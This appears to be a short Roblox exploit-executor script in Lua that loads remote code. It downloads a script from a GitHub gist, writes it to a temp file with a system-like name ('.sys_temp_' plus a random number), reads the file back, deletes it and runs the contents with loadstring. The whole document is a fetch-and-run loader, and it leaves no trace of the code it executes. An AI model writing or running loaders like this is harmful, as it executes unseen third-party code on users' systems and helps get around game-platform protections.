task.wait(1) local url = "https://gist.githubusercontent.com/oiPOLAR/2369f5e909b025daf74e0612f45076fc/raw/Redirecionador%20SCRICORD" local n = ".sys_temp_" .. math.random(100, 999) writefile(n, game:HttpGet(url .. "?t=" .. tick(), true)) local s = readfile(n) delfile(n) loadstring(s)()